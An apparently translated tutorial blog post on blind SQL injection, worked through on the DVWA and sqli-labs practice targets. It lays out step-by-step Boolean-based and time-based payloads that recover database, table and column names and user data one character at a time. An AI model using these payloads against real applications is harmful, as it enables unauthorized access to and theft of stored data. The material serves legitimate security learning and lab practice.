Summer precipitation Web Learning - SQL injection (Boolean blind injection & time blind injection)
2022-07-22 14:18:00 【Wang Zui Zui】
Boolean blind injection
When data is entered, the page reveals only whether the query result was "normal" or "abnormal" (a row came back or it did not); no other information from the query is echoed back.
Functions used in Boolean blind injection
length(str) // returns the length of the string
ord(str) / ascii(str) // returns the ASCII code of the leftmost character of str
substring(str, start, len) // takes len characters from str, starting at position start (positions count from 1)
char(num) // returns the character whose ASCII code is num
Boolean blind injection test payloads
select length(database()) = 4; // judge the length of the database name (the same trick works for table and column name lengths)
select ord('a') = 97; // judge what an unknown character is by comparing its ASCII code
select ord(substring(database(),1,1)) = 100; // take the first character of the database name and judge what it is
The main idea of Boolean blind injection: use these functions together with equalities and inequalities to judge the length of a value, then guess it one character at a time. First recover the database name, then use it to find out how many tables there are, then recover each table name one character at a time, and so on down to column names and row data.
Boolean blind injection range practice (DVWA)
First, judge whether there is SQL injection.
Numeric type? 1 and 1=1 / 1 and 1=2 : both give the same result, so the id is not used as a number
Character type? 1' and '1'='1 : normal result; 1' and '1'='2 : no result
This indicates a character-type SQL injection.
Because the result page does not echo any data from the query, only blind injection can be tried.
From the source code, the SQL statement is
SELECT first_name, last_name FROM users WHERE user_id = '$id'
Step one: determine the length of the database name
payload (two forms):
1' and length(database()) = 4#
-1' or length(database()) = 4#
We did not know in advance that the database name is dvwa, so start with range checks such as length(database()) < 10 and length(database()) > 1 and narrow the range down step by step (halving it each time costs far fewer requests than testing = 1, = 2, ... in turn) until length(database()) = 4 gives the "exists" result, which confirms the guess.
Step two: recover the database name
payload:
1' and ord(substring(database(),1,1)) = 100# // the first letter of the database name is d, the letter with ASCII code 100
1' and ord(substring(database(),2,1)) = 118# // the second letter of the database name is v, the letter with ASCII code 118
...
Use substring to take one character of the database name at a time, from position 1 up to position 4 (step one established that the name is 4 characters long), then use ord to turn it into an ASCII code and compare, to judge what each character is.
Step three: judge how many tables the dvwa database has
payload:
1' and (select count(table_name) from information_schema.tables where table_schema='dvwa') = 2# // judge how many tables the dvwa database has
Step four: judge the length of the first table name, the second table name, ...
payload:
1' and length((select table_name from information_schema.tables where table_schema='dvwa' limit 0,1)) = 9# // judge the length of the first table name in the dvwa database (guestbook)
1' and length((select table_name from information_schema.tables where table_schema='dvwa' limit 1,1)) = 5# // judge the length of the second table name in the dvwa database (users)
Too tired to write them all out; every payload follows the same pattern:
1' and ord(substring((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1)) = 103# // the first letter of the first table name in dvwa is g, ASCII code 103
1' and ord(substring((select table_name from information_schema.tables where table_schema=database() limit 0,1),2,1)) = 117# // the second letter of the first table name in dvwa is u, ASCII code 117
...
1' and ord(substring((select table_name from information_schema.tables where table_schema=database() limit 1,1),1,1)) = 117# // the first letter of the second table name in dvwa is u, ASCII code 117
1' and ord(substring((select table_name from information_schema.tables where table_schema=database() limit 1,1),2,1)) = 115# // the second letter of the second table name is s, ASCII code 115
...
1' and (select count(column_name) from information_schema.columns where table_schema = 'dvwa' and table_name = 'users') = 8# // judge the number of columns in the users table of the dvwa database
1' and length((select column_name from information_schema.columns where table_schema = 'dvwa' and table_name = 'users' limit 0,1)) = 7# // judge the length of the first column name in the users table of the dvwa database
1' and ord(substring((select column_name from information_schema.columns where table_name='users' limit 0,1),1,1)) = 117# // the first letter of the first column name in the users table is u, ASCII code 117
1' and ord(substring((select column_name from information_schema.columns where table_name='users' limit 0,1),2,1)) = 115# // the second letter of the first column name in the users table is s, ASCII code 115
...
1' and ord(substring((select column_name from information_schema.columns where table_name='users' limit 1,1),1,1)) = 102# // the first letter of the second column name in the users table is f, ASCII code 102
1' and ord(substring((select column_name from information_schema.columns where table_name='users' limit 1,1),2,1)) = 105# // the second letter of the second column name in the users table is i, ASCII code 105
...
1' and ord(substring((select user from dvwa.users limit 0,1),1,1)) = 97# // the first character of the user column value in the first row of dvwa.users is a, ASCII code 97
1' and ord(substring((select user from dvwa.users limit 0,1),2,1)) = 100# // the second character of the user column value in the first row of dvwa.users is d, ASCII code 100
...
Time-based blind injection
Boolean blind injection at least has two distinguishable responses, one for a true condition and one for a false one. But there are pages where nothing changes in the response at all; there, time-based blind injection may still work.
Range used: sqli-labs-master less-9
No matter what id is entered, the response is always the same.
Functions used in time-based blind injection
if(a,b,c) // if a is true, evaluate b; otherwise evaluate c
sleep(x) // pause the query for x seconds
left(str, n) // take the first n characters of str, counting from the left
Time-based blind injection test payloads
select 1 and if(length(database()) = 4, sleep(3), 1)
1' and sleep(3) --+ // test whether time-based blind injection is possible (--+ : the + becomes a space after URL decoding, which the MySQL -- comment requires)
By judging whether the page responds immediately or only after the delay, we learn whether the injected condition is true or false, and can then recover the data we want step by step.
Time-based blind injection range practice
SQL source code:
$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";
payload:
1' and sleep(5) --+ // determine whether there is an injection point: the response should arrive about 5 seconds late
1' and if(length(database())=8,sleep(3),1) --+ // judge whether the database name is 8 characters long
1' and if(left(database(),1)='s',sleep(3),1) --+ // judge whether the first character of the database name is 's'
1' and if(left(database(),2)='se',sleep(3),1) --+ // judge whether the first two characters of the database name are 'se'
...
1' and if(left(database(),8)='security',sleep(3),1) --+ // the database name is 'security'
1' and if(length((select table_name from information_schema.tables where table_schema=database() limit 0,1))=6,sleep(3),1) --+ // judge the length of the first table name in the current database
1' and if(left((select table_name from information_schema.tables where table_schema=database() limit 0,1),1)='e',sleep(3),1) --+ // is the first character of the first table name 'e'
1' and if(left((select table_name from information_schema.tables where table_schema=database() limit 0,1),2)='em',sleep(3),1) --+ // are the first two characters of the first table name 'em'
...
1' and if(left((select table_name from information_schema.tables where table_schema=database() limit 0,1),6)='emails',sleep(3),1) --+ // the first table name is 'emails'
1' and if(length((select column_name from information_schema.columns where table_name='emails' limit 0,1))=2,sleep(3),1) --+ // judge the length of the first column name in the 'emails' table of the 'security' database
1' and if(left((select column_name from information_schema.columns where table_name='emails' limit 0,1),1)='i',sleep(3),1) --+ // judge whether the first letter of the first column name in the 'emails' table is 'i'
1' and if(left((select column_name from information_schema.columns where table_name='emails' limit 0,1),2)='id',sleep(3),1) --+ // judge whether the first two letters of the first column name in the 'emails' table are 'id'